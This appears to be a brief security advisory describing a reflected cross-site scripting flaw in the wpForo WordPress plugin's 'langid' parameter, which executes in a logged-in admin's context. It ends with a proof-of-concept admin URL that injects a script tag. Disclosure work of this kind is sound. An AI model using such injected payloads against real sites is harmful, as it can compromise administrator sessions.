The plugin did not escape, validate or escape the ‘langid’ GET parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in admin
https://example.com/wp-admin/admin.php?page=wpforo-phrases&ids&action=-1&langid="><script>alert(/XSS/)</script>&phrase_package=0&paged=1&action2=-1